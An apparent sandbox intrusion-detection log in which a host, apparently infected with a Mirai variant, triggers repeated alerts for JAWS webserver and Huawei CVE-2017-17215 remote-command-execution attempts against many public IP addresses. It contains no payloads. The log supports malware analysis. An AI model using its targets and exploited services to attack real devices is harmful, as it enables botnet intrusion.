                                                2024-12-03T22:17:11.430700+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235199244.100.34.19080TCP
                                                2024-12-03T22:17:11.430700+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235199244.100.34.19080TCP
                                                2024-12-03T22:17:11.430716+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233553444.223.88.22280TCP
                                                2024-12-03T22:17:11.430716+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233553444.223.88.22280TCP
                                                2024-12-03T22:17:11.436228+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353878219.159.129.9180TCP
                                                2024-12-03T22:17:11.436228+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353878219.159.129.9180TCP
                                                2024-12-03T22:17:11.436283+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350606106.119.111.4980TCP
                                                2024-12-03T22:17:11.436283+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350606106.119.111.4980TCP
                                                2024-12-03T22:17:11.436402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234121872.185.180.18880TCP
                                                2024-12-03T22:17:11.436402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234121872.185.180.18880TCP
                                                2024-12-03T22:17:11.445525+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336024161.83.220.8580TCP
                                                2024-12-03T22:17:11.445525+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336024161.83.220.8580TCP
                                                2024-12-03T22:17:11.452029+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351966115.64.13.9180TCP
                                                2024-12-03T22:17:11.452029+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351966115.64.13.9180TCP
                                                2024-12-03T22:17:11.461521+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334050133.151.36.23780TCP
                                                2024-12-03T22:17:11.461521+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334050133.151.36.23780TCP
                                                2024-12-03T22:17:11.461751+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233551019.67.64.3780TCP
                                                2024-12-03T22:17:11.461751+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233551019.67.64.3780TCP
                                                2024-12-03T22:17:11.461824+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350274122.157.177.13080TCP
                                                2024-12-03T22:17:11.461824+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350274122.157.177.13080TCP
                                                2024-12-03T22:17:11.462032+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344588186.244.224.180TCP
                                                2024-12-03T22:17:11.462032+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344588186.244.224.180TCP
                                                2024-12-03T22:17:11.470526+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2346164120.53.85.17480TCP
                                                2024-12-03T22:17:11.470526+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2346164120.53.85.17480TCP
                                                2024-12-03T22:17:11.471996+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339452150.32.225.13380TCP
                                                2024-12-03T22:17:11.471996+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339452150.32.225.13380TCP
                                                2024-12-03T22:17:11.472003+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339680149.70.197.24580TCP
                                                2024-12-03T22:17:11.472003+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339680149.70.197.24580TCP
                                                2024-12-03T22:17:11.472007+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2344360156.101.171.5437215TCP
                                                2024-12-03T22:17:11.472015+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234238495.148.172.17080TCP
                                                2024-12-03T22:17:11.472015+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234238495.148.172.17080TCP
                                                2024-12-03T22:17:11.472034+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337802205.37.220.22480TCP
                                                2024-12-03T22:17:11.472034+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337802205.37.220.22480TCP
                                                2024-12-03T22:17:11.472096+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352012101.26.29.8480TCP
                                                2024-12-03T22:17:11.472096+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352012101.26.29.8480TCP
                                                2024-12-03T22:17:11.472097+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234060218.120.91.23780TCP
                                                2024-12-03T22:17:11.472097+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234060218.120.91.23780TCP
                                                2024-12-03T22:17:11.472107+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233778666.28.161.17080TCP
                                                2024-12-03T22:17:11.472107+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233778666.28.161.17080TCP
                                                2024-12-03T22:17:11.472128+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337950159.180.151.11780TCP
                                                2024-12-03T22:17:11.472128+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337950159.180.151.11780TCP
                                                2024-12-03T22:17:11.472144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235367813.77.179.19280TCP
                                                2024-12-03T22:17:11.472144+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235367813.77.179.19280TCP
                                                2024-12-03T22:17:11.472161+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234826870.167.174.22480TCP
                                                2024-12-03T22:17:11.472161+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234826870.167.174.22480TCP
                                                2024-12-03T22:17:11.477295+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2343316115.161.242.23180TCP
                                                2024-12-03T22:17:11.477295+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2343316115.161.242.23180TCP
                                                2024-12-03T22:17:11.477614+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335752112.106.103.20780TCP
                                                2024-12-03T22:17:11.477614+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335752112.106.103.20780TCP
                                                2024-12-03T22:17:11.478015+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335558159.216.106.17380TCP
                                                2024-12-03T22:17:11.478015+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335558159.216.106.17380TCP
                                                2024-12-03T22:17:11.478217+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235588270.48.67.13280TCP
                                                2024-12-03T22:17:11.478217+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235588270.48.67.13280TCP
                                                2024-12-03T22:17:11.478430+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233712452.147.152.23180TCP
                                                2024-12-03T22:17:11.478430+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233712452.147.152.23180TCP
                                                2024-12-03T22:17:11.478558+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2337904208.170.5.22280TCP
                                                2024-12-03T22:17:11.478558+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2337904208.170.5.22280TCP
                                                2024-12-03T22:17:11.478696+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2352248182.205.184.22080TCP
                                                2024-12-03T22:17:11.478696+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2352248182.205.184.22080TCP
                                                2024-12-03T22:17:11.478846+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235283683.119.82.14680TCP
                                                2024-12-03T22:17:11.478846+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235283683.119.82.14680TCP
                                                2024-12-03T22:17:11.492957+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23598388.163.124.14380TCP
                                                2024-12-03T22:17:11.492957+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23598388.163.124.14380TCP
                                                2024-12-03T22:17:11.493248+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349242156.47.9.15980TCP
                                                2024-12-03T22:17:11.493248+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349242156.47.9.15980TCP
                                                2024-12-03T22:17:11.493275+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233669683.228.148.6880TCP
                                                2024-12-03T22:17:11.493275+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233669683.228.148.6880TCP
                                                2024-12-03T22:17:11.493289+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234886649.132.127.25480TCP
                                                2024-12-03T22:17:11.493289+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234886649.132.127.25480TCP
                                                2024-12-03T22:17:11.493296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357510117.255.80.13180TCP
                                                2024-12-03T22:17:11.493296+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357510117.255.80.13180TCP
                                                2024-12-03T22:17:11.493312+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234170286.199.183.4080TCP
                                                2024-12-03T22:17:11.493312+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234170286.199.183.4080TCP
                                                2024-12-03T22:17:11.508192+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2350074178.167.225.2080TCP
                                                2024-12-03T22:17:11.508192+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2350074178.167.225.2080TCP
                                                2024-12-03T22:17:11.508613+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341426202.130.12.21280TCP
                                                2024-12-03T22:17:11.508613+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341426202.130.12.21280TCP
                                                2024-12-03T22:17:11.508814+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236092632.60.240.15580TCP
                                                2024-12-03T22:17:11.508814+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236092632.60.240.15580TCP
                                                2024-12-03T22:17:11.509043+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333070116.198.57.1780TCP
                                                2024-12-03T22:17:11.509043+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333070116.198.57.1780TCP
                                                2024-12-03T22:17:11.509144+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356374163.247.225.17380TCP
                                                2024-12-03T22:17:11.509144+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356374163.247.225.17380TCP
                                                2024-12-03T22:17:11.509250+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23455301.78.144.17880TCP
                                                2024-12-03T22:17:11.509250+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23455301.78.144.17880TCP
                                                2024-12-03T22:17:11.509310+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23440642.116.62.18180TCP
                                                2024-12-03T22:17:11.509310+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23440642.116.62.18180TCP
                                                2024-12-03T22:17:11.509447+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345496161.115.163.8880TCP
                                                2024-12-03T22:17:11.509447+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345496161.115.163.8880TCP
                                                2024-12-03T22:17:11.523616+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355606138.128.101.13580TCP
                                                2024-12-03T22:17:11.523616+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355606138.128.101.13580TCP
                                                2024-12-03T22:17:11.592791+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2352870156.126.99.23937215TCP
                                                2024-12-03T22:17:11.623968+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2345042155.207.215.1180TCP
                                                2024-12-03T22:17:11.623968+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2345042155.207.215.1180TCP
                                                2024-12-03T22:17:11.640071+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359800111.131.4.8780TCP
                                                2024-12-03T22:17:11.640071+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359800111.131.4.8780TCP
                                                2024-12-03T22:17:11.649606+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234992273.123.193.3980TCP
                                                2024-12-03T22:17:11.649606+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234992273.123.193.3980TCP
                                                2024-12-03T22:17:11.669635+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2357504186.44.230.5180TCP
                                                2024-12-03T22:17:11.669635+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2357504186.44.230.5180TCP
                                                2024-12-03T22:17:11.686349+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2358206146.239.100.8480TCP
                                                2024-12-03T22:17:11.686349+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2358206146.239.100.8480TCP
                                                2024-12-03T22:17:12.586366+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356452197.193.108.12037215TCP
                                                2024-12-03T22:17:12.592509+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2357304197.132.62.11937215TCP
                                                2024-12-03T22:17:12.592650+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233337041.30.218.20737215TCP
                                                2024-12-03T22:17:12.601888+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339548156.81.76.1037215TCP
                                                2024-12-03T22:17:12.624095+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353450197.166.40.13337215TCP
                                                2024-12-03T22:17:12.639583+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342194197.26.74.23737215TCP
                                                2024-12-03T22:17:12.648840+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.233818841.7.124.2537215TCP
                                                2024-12-03T22:17:12.664585+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2339518156.170.127.6937215TCP
                                                2024-12-03T22:17:13.461643+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234483023.93.194.13380TCP
                                                2024-12-03T22:17:13.461643+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234483023.93.194.13380TCP
                                                2024-12-03T22:17:13.468402+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.236017699.212.18.16680TCP
                                                2024-12-03T22:17:13.468402+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.236017699.212.18.16680TCP
                                                2024-12-03T22:17:13.468430+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2356424145.20.17.1380TCP
                                                2024-12-03T22:17:13.468430+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2356424145.20.17.1380TCP
                                                2024-12-03T22:17:13.477061+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23402768.43.2.15580TCP
                                                2024-12-03T22:17:13.477061+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23402768.43.2.15580TCP
                                                2024-12-03T22:17:13.477262+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2334760210.36.162.13680TCP
                                                2024-12-03T22:17:13.477262+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2334760210.36.162.13680TCP
                                                2024-12-03T22:17:13.483741+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333488125.111.75.10580TCP
                                                2024-12-03T22:17:13.483741+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333488125.111.75.10580TCP
                                                2024-12-03T22:17:13.493239+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2360086176.10.51.16280TCP
                                                2024-12-03T22:17:13.493239+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2360086176.10.51.16280TCP
                                                2024-12-03T22:17:13.499892+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2344762201.157.7.21780TCP
                                                2024-12-03T22:17:13.499892+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2344762201.157.7.21780TCP
                                                2024-12-03T22:17:13.500179+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234100697.55.138.4880TCP
                                                2024-12-03T22:17:13.500179+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234100697.55.138.4880TCP
                                                2024-12-03T22:17:13.509239+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233448264.69.46.20780TCP
                                                2024-12-03T22:17:13.509239+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233448264.69.46.20780TCP
                                                2024-12-03T22:17:13.509321+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.233484873.104.148.9580TCP
                                                2024-12-03T22:17:13.509321+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.233484873.104.148.9580TCP
                                                2024-12-03T22:17:13.509529+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234599493.104.201.6580TCP
                                                2024-12-03T22:17:13.509529+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234599493.104.201.6580TCP
                                                2024-12-03T22:17:13.514929+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340132128.106.21.14180TCP
                                                2024-12-03T22:17:13.514929+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340132128.106.21.14180TCP
                                                2024-12-03T22:17:13.514997+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2354072194.18.61.9480TCP
                                                2024-12-03T22:17:13.514997+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2354072194.18.61.9480TCP
                                                2024-12-03T22:17:13.523796+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341618101.211.231.25180TCP
                                                2024-12-03T22:17:13.523796+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341618101.211.231.25180TCP
                                                2024-12-03T22:17:13.524305+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349154107.229.45.19180TCP
                                                2024-12-03T22:17:13.524305+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349154107.229.45.19180TCP
                                                2024-12-03T22:17:13.524472+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23550862.233.134.11680TCP
                                                2024-12-03T22:17:13.524472+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23550862.233.134.11680TCP
                                                2024-12-03T22:17:13.524760+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.23371761.252.247.6880TCP
                                                2024-12-03T22:17:13.524760+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.23371761.252.247.6880TCP
                                                2024-12-03T22:17:13.540105+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2336864159.157.188.5280TCP
                                                2024-12-03T22:17:13.540105+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2336864159.157.188.5280TCP
                                                2024-12-03T22:17:13.555986+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234811654.6.47.12480TCP
                                                2024-12-03T22:17:13.555986+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234811654.6.47.12480TCP
                                                2024-12-03T22:17:13.556042+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355390103.104.235.12080TCP
                                                2024-12-03T22:17:13.556042+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355390103.104.235.12080TCP
                                                2024-12-03T22:17:13.556149+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2333352213.75.138.15580TCP
                                                2024-12-03T22:17:13.556149+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2333352213.75.138.15580TCP
                                                2024-12-03T22:17:13.556242+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2351820110.23.29.22080TCP
                                                2024-12-03T22:17:13.556242+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2351820110.23.29.22080TCP
                                                2024-12-03T22:17:13.670945+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2353464128.160.146.6280TCP
                                                2024-12-03T22:17:13.670945+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2353464128.160.146.6280TCP
                                                2024-12-03T22:17:13.701998+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234482813.37.13.25180TCP
                                                2024-12-03T22:17:13.701998+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234482813.37.13.25180TCP
                                                2024-12-03T22:17:13.823865+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2341832192.18.96.17380TCP
                                                2024-12-03T22:17:13.823865+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2341832192.18.96.17380TCP
                                                2024-12-03T22:17:13.823878+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356048197.105.173.17037215TCP
                                                2024-12-03T22:17:13.823918+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234853857.247.150.10580TCP
                                                2024-12-03T22:17:13.823918+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234853857.247.150.10580TCP
                                                2024-12-03T22:17:13.823925+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235691446.96.134.25180TCP
                                                2024-12-03T22:17:13.823925+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235691446.96.134.25180TCP
                                                2024-12-03T22:17:13.824019+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235596276.165.243.280TCP
                                                2024-12-03T22:17:13.824019+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235596276.165.243.280TCP
                                                2024-12-03T22:17:13.824036+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2355198138.190.218.6480TCP
                                                2024-12-03T22:17:13.824036+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2355198138.190.218.6480TCP
                                                2024-12-03T22:17:13.824059+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2349884175.136.0.20680TCP
                                                2024-12-03T22:17:13.824059+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2349884175.136.0.20680TCP
                                                2024-12-03T22:17:13.824072+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235126817.188.107.7680TCP
                                                2024-12-03T22:17:13.824072+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235126817.188.107.7680TCP
                                                2024-12-03T22:17:14.657703+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339196124.243.135.2480TCP
                                                2024-12-03T22:17:14.657703+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339196124.243.135.2480TCP
                                                2024-12-03T22:17:14.742508+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353260197.235.112.16037215TCP
                                                2024-12-03T22:17:14.764675+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339612191.228.77.21080TCP
                                                2024-12-03T22:17:14.764675+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339612191.228.77.21080TCP
                                                2024-12-03T22:17:14.815283+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2342840189.147.217.22480TCP
                                                2024-12-03T22:17:14.815283+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2342840189.147.217.22480TCP
                                                2024-12-03T22:17:14.815296+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359226116.216.114.680TCP
                                                2024-12-03T22:17:14.815296+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359226116.216.114.680TCP
                                                2024-12-03T22:17:14.842813+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2339456156.146.98.2480TCP
                                                2024-12-03T22:17:14.842813+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2339456156.146.98.2480TCP
                                                2024-12-03T22:17:14.898656+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2338702180.60.94.13280TCP
                                                2024-12-03T22:17:14.898656+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2338702180.60.94.13280TCP
                                                2024-12-03T22:17:14.898776+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2335332174.196.88.17380TCP
                                                2024-12-03T22:17:14.898776+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2335332174.196.88.17380TCP
                                                2024-12-03T22:17:14.976855+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2340120131.59.130.9480TCP
                                                2024-12-03T22:17:14.976855+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2340120131.59.130.9480TCP
                                                2024-12-03T22:17:15.914658+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.234215260.178.102.14180TCP
                                                2024-12-03T22:17:15.914658+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.234215260.178.102.14180TCP
                                                2024-12-03T22:17:15.935363+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2342236197.1.206.13937215TCP
                                                2024-12-03T22:17:15.967638+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.235076241.67.28.5537215TCP
                                                2024-12-03T22:17:16.008813+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2353344156.100.250.17037215TCP
                                                2024-12-03T22:17:16.014530+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.235480089.137.176.14180TCP
                                                2024-12-03T22:17:16.014530+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.235480089.137.176.14180TCP
                                                2024-12-03T22:17:16.015072+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2350676156.13.215.13237215TCP
                                                2024-12-03T22:17:16.015281+01002029034ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.2359578179.140.51.21780TCP
                                                2024-12-03T22:17:16.015281+01002030092ET MALWARE JAWS Webserver Unauthenticated Shell Command Execution1192.168.2.2359578179.140.51.21780TCP
                                                2024-12-03T22:17:16.023873+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2348634156.210.38.12737215TCP
                                                2024-12-03T22:17:16.023930+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.2356676197.199.137.23237215TCP
